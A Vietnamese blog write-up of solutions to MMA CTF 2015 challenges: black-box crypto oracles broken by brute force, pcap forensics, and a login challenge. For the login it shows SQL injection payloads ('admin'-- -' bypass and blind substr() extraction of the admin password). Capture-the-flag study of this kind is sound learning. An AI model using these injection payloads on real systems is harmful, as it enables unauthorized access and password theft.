Link CTF:
http://score.mmactf.link
Lâu rồi mới có 1 CTF để thử xem trình độ của mình đang ở đâu.
Mình quyết định chơi solo. Một số bài bí quá thì nhờ sự hỗ trợ từ một số bạn team khác.
Nãy mình quay clip showup nhưng đang quay thì trang của MMACTF báo lỗi nên mình bỏ rồi.
Sau đây mình sẽ writeup một số bài mình đã làm được trong MMA CTF 2015.
Welcome!!
Quá đơn giản phải không?
Copy và paste
MMA{Welcome_To_MMACTF!!} vào ô Flag và submit.
10 điểm đầu tiên :D
Pattern Lock
Bài này mình google chứ chịu thôi. Giờ cũng quên mất flag rồi :D
Problem
Decrypt 4 flags.
- 36 36 2a 64 4b 4b 4a 21 1e 4b 1f 20 1f 21 4d 4b 1b 1d 19 4f 21 4c 1d
4a 4e 1c 4c 1b 22 4f 22 22 1b 21 4c 20 1d 4f 1f 4c 4a 19 22 1a 66
- e3 e3 83 21 33 96 23 43 ef 9a 9a 05 18 c7 23 07 07 07 c7 9a 04 33 23
07 23 ef 12 c7 04 96 43 23 23 18 04 04 05 c7 fb 18 96 43 ef 43 ff
- 60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56
0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e
- 62 a9 6c 28 0e 33 31 c6 68 cd 66 66 59 46 cc 53 0c 98 31 65 c6 35 c9
a9 60 4e 37 b0 33 46 0d 60 46 26 66 33 cc e6 a9 f6 6c 07 2b 23 af
Bài này có tới 4 flag để giải quyết.
OK Bắt tay vào làm nào:
crypt2:
Ta thử một vài trường hợp:
a => 4a
ab => 4a 4b
ba => 4b 4a
acb => 4a 4b 4c
OK vậy là với mỗi kí tự trong bảng ascii sẽ tương ứng với 1 hex
Flag của MMA có dạng MMA{something}
=> Ta nhập bộ charset là 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}
kết quả ta được:
1a 1b 1c 1d 1e 1f 20 21 22 19 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57
58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35
36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 64 66
Mỗi kí tự trong charset tương ứng với 1 hex trong cùng thứ tự với kết quả.
So sánh từng kí tự trong cipher đề cho để decrypt ra flag:
Mình code luôn cho nhanh:
http://pastebin.com/GT7cr1bF
Flag: MMA{bba85b6768db240f8c4ae3c29f9928c74f6ca091}
crypt4:
Tương tự crypt2:
Charsets: 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}
Kết quả trả về:
c7 23 c3 18 96 05 9a 07 12 04 ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f
a8 51 a3 40 8f 92 9d 38 f5 bc b6 da 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29
e3 2f 84 53 d1 00 ed 20 fc b1 5b 6a cb be 21 ff
Flag: MMA{f52da776412888170f282a9105d2240061c45dad}
crypt5:
Ta đã biết flag có dạng MMA{something}
và something có charsets là: 0123456789abcdef
Nên ta nhập 4 kí tự đầu của flag và thử thêm 1 số trường hợp:
MMA{ => 49 00 0c 3a
MMA{a => 48 00 0c 3a 1a
MMA{b => 48 00 0c 3a 19
MMA{c => 48 00 0c 3a 18
MMA{aa => 4b 00 0c 3a 1a 00
MMA{ab => 4b 00 0c 3a 1a 03
MMA{bb => 4b 00 0c 3a 19 00
MMA{f52da776412888170f282a9105d2240061c45dad} => 60 00 0c 3a 1d 53 07 56 05 56 00 01 02 05 03 0a 00 00 09 06 07 56 54 0a
0a 53 58 08 01 05 51 56 00 06 04 00 06 07 52 57 01 51 05 05 19 (flag crypt4)
Ta thấy hex đầu tiên liên quan tới độ dài của chuỗi ta nhập vào.
Từ hex thứ 2 trở đi thì mỗi hex tương ứng 1 kí tự ta nhập vào.
Ở tại mỗi vị trí thì hex trả về khác với hex ở ví trị khác. (ở trên ta thấy MM nhưng hex trả về là 00 và 0c)
OK vậy bruteforce thôi.
Với mỗi vị trí ta thử với 1 kí tự trong charsets sao cho hex trả về tương ứng hex với cipher (tạm bỏ qua hex đầu liên quan tới số độ dài flag)
Mình cũng code luôn:
http://pastebin.com/pAVLNY9z (yêu cầu cài thư viện selenium
http://selenium-python.readthedocs.org/)
Flag: MMA{e75fd59d2c9f9c227d28ff412c3fea3787c1fe73}
crypt6:
Bài này cần tìm ra quy luật của nó mới giải được.
Nó khá khác với những bài trên.
Test:
MMA{0123456789abcdef0123456789abcdef01234567} => 64 a9 cc 28 a1
81 53 64 c6 a1 cd c6 1c 1c 39 c2 c2 8d c4 56 8d 0c 23 a9 56
31 cc 53 0c 39 31 23 64 31 cc cc a1 c4 53 f6 c6 cc cd cd be
MMA{1123456789abcdef0123456789abcdef01234567} => 64 a9 cc 28 a1
89 53 64 c6 a1 cd
c6 1c 1c 39 c2 c2 8d c4 56 8d 0c 23 a9 56
62 cc 53 0c 39 31 23 64 31 cc cc a1 c4 53 f6 c6 cc cd
cd be
MMA{112345a789abcdef0123456789abcdef01234567} => 64 a9 cc 28 a1 89 53 64 c6 a1 cd
2c 1c 1c 39 c2 c2 8d c4 56 8d 0c 23 a9 56 62 cc 53 0c 39 31 23 64 31 cc cc a1 c4 53 f6 c6 cc cd
6e be
=> Mỗi kí tự sẽ tác động tới hex tại 2 vị trí
Hướng giải quyết: Ta thu thập tất cả các vị trí mà hex bị thay đổi, sau đó tìm những kí tự có liên quan vị trí hex của những kí tự MMA{ và } để fix cho giống với hex của cipher tại vị trí tương ứng
Vị trí flag tác động lên kí tự trong chuỗi hex trả về như sau:
pos[0]=[3, 4, 69, 70]
pos[1]=[9, 10, 69, 70]
pos[2]=[9, 10, 117, 118]
pos[3]=[15, 16, 117, 118]
pos[4]=[15, 16, 75, 76]
pos[5]=[21, 22, 75, 76]
pos[6]=[21, 22, 105, 106]
pos[7]=[27, 28, 105, 106]
pos[8]=[27, 28, 81, 82]
pos[9]=[33, 34, 81, 82]
pos[10]=[33, 34, 129, 130]
pos[11]=[39, 40, 129, 130]
pos[12]=[39, 40, 87, 88]
pos[13]=[45, 46, 87, 88]
pos[14]=[45, 46, 111, 112]
pos[15]=[51, 52, 111, 112]
pos[16]=[51, 52, 93, 94]
pos[17]=[57, 58, 93, 94]
pos[18]=[57, 58, 123, 124]
pos[19]=[63, 64, 123, 124]
pos[20]=[63, 64, 99, 100]
pos[21]=[0, 1, 99, 100]
pos[22]=[0, 1, 6, 7]
pos[23]=[6, 7, 12, 13]
pos[24]=[12, 13, 18, 19]
pos[25]=[18, 19, 24, 25]
pos[26]=[24, 25, 30, 31]
pos[27]=[30, 31, 36, 37]
pos[28]=[36, 37, 42, 43]
pos[29]=[42, 43, 48, 49]
pos[30]=[48, 49, 54, 55]
pos[31]=[54, 55, 60, 61]
pos[32]=[60, 61, 66, 67]
pos[33]=[66, 67, 72, 73]
pos[34]=[72, 73, 78, 79]
pos[35]=[78, 79, 84, 85]
pos[36]=[84, 85, 90, 91]
pos[37]=[90, 91, 96, 97]
pos[38]=[96, 97, 102, 103]
pos[39]=[102, 103, 108, 109]
pos[40]=[108, 109, 114, 115]
pos[41]=[114, 115, 120, 121]
pos[42]=[120, 121, 126, 127]
pos[43]=[126, 127, 132, 133]
Ta fix từ vị trí thứ 4 trở đi sau MMA{
Tại vị trí thứ 4 của flag ta thử từng ký tự trong charsets 0123456789abcdef để vị trí kí tự của hex trả về tại 15,16 giống với các kí tự tại vị trí 15,16 của cipher
Rồi tiếp tục các kí tự thứ 5,6,7,...
Mình cũng code nốt:
http://pastebin.com/N9bJFBsh
Flag: MMA{f9cf7a3ddd5710e85116814fef01c907f4df35ce}
Vậy là hoàn thành 4 bài crypto :D
======================
Login as admin!
Flag là mật khẩu admin
OK. Test thôi
Thử admin:admin nhưng
invalid username or password
Thử tiếp: user:user
You are test user.
logout
OK. Vậy ta phải login = admin.
Test bypass login:
Query: username=admin'-- -&password=XXX
Congratulations!!
You are admin user.
The flag is your password!
logout
OK vậy dính lỗi sql rồi.
Bài này nó không xuất thông tin cho chúng ta ngoài việc login thành công thì xuất
You are ... và sai tài khoản hoặc mật khẩu thì invalid username or password
Vậy ta nghĩ ngay tới blind sql injection.
query: username=test' and password='test'-- -&password=XXX
=>
You are test user.
Vậy có column password trong table.
Blind password admin thôi :D
query: username=admin' and substr(password,1,1)='
a'-- -&password=XXX
result:
invalid username or password
Ta biết flag (password của admin) có định dạng MMA{something} nên thử chữ M
query: username=admin' and substr(password,1,1)='
M'-- -&password=XXX
result:
Congratulations!!
You are admin user.
The flag is your password!
logout
OK vậy mình code thôi :D
http://pastebin.com/kUNkkPbr
Flag:
MMA{cats_alice_band}
======================
stream... Forensics
Đề cho:
http://assets.score.mmactf.link/attachments/stream-ae909d8550c45e47b3c888c3c35ce5a6699de5390968e91b53a718d73c237718
Nếu chưa biết định dạng gì thì cho vào hex editor coi có string Dumpcap 1.12.7 => open với wireshark coi thôi
Ubuntu nó tự nhận diện file type rồi nên mình mở được ngay
Đa phần packet liên quan tới GET HTTP request ở packet thứ 21.
Follow tcp stream:
Cái này khá lạ với mình nên mình sẽ bắt đầu tìm một số thông tin.
Bắt đầu từ cái User-Agent:
NSPlayer/9.0.0.4503
Google ta được:
https://github.com/gshutler/useragent/blob/master/lib/user_agent/browsers/windows_media_player.rb
# Windows XP with Windows Media Player 9::
# NSPlayer/9.0.0.4503
# NSPlayer/9.0.0.4503 WMFSDK/9.0
# Windows-Media-Player/9.00.00.4503
=> Đoán ngay nó stream video qua Windows Media Player
Một số thông tin trong http header khác mình đã tìm nhưng không có gì đặc biệt.
Tiếp theo mình tìm header
$H xem là file gì hay cái gì đó
https://msdn.microsoft.com/en-us/library/cc251289.aspx
Lúc đầu mình nghĩ ngay là phải dựng con server cho nó stream video cho thằng Windows Media Player nhưng google mãi không biết cách tạo. Cuối cùng mình đành dùng cách là code socket giả lập lại y hệt những gì nó gửi cho WMP.
Lưu lại thành stream.bin
Code:
http://pastebin.com/jPFcKDKi
Mình run code python trên Win 7. Sau đó vô WMP
Nhập
http://127.0.0.1:8080 vào và OK
Flag:
MMA{windows_xp_is_too_old_to_create_problem!!}
==============
Splitted forensic
Đề cho:
http://assets.score.mmactf.link/attachments/splitted.7z-68ad844f2aab26d3d358ae9fa6c598a2727b0c0056567a288ffcd9414229121c
splitted.7z => extract file ta được 1 file splitted.pcap => Mở với wireshark
Đập ngay vào mắt là /flag.zip
OK export http object ngay và luôn
File => Export Objects => HTTP
Lắm flag.zip thế này :v
Save all về xem xét
Quăng hết vô hexeditor coi nào (mình dùng Bless Hex Editor)
File ZIP có file signature (magic number) là PK mà trong đâu không có PK ?
Mở sang file flag(1).zip:
PK đây rồi. File bị nén là
flag.psd
Thử extract xem sao:
Ố ồ. Vậy là ta cần ghép các file flag.zip lại thành 1 file zip hoàn chỉnh nhưng... thứ tự các file này đã bị thay đổi.
Nếu thử sắp xếp rồi extract thì ta có tổ hợp quá trời là trường hợp.
Vậy sao đây?
Đề cho mỗi 1 file pcap thì vô file đó tìm thêm thông tin thôi :D
Follow 1 HTTP stream:
Bingo... Thứ tự của nó là đây :D
OK ta chỉ cần coi range và đổi lại tên file cho đúng với range sau đó gộp các file lại là được 1 file ZIP hoàn chỉnh
Giải nén file zip:
ta được file
flag.psd
A .PSD file is a layered image file used in
Adobe PhotoShop. PSD, which stands for Photoshop Document, is the
default format that Photoshop uses for saving ...
Mình không có cài PhotoShop. Làm sao giờ?
PhotoShop online thôi :D
http://vforum.vn/photoshop/
Trắng như ô mô thế này
Để ý ta thấy có tới 2 layers.
Ẩn layer 1 đi bằng cách unstick.
Done! Flag:
MMA{sneak_spy_sisters}
==============
Mình tạm dừng tại đây có thời gian mình sẽ writeup hoặc showup tiếp một số bài nữa!
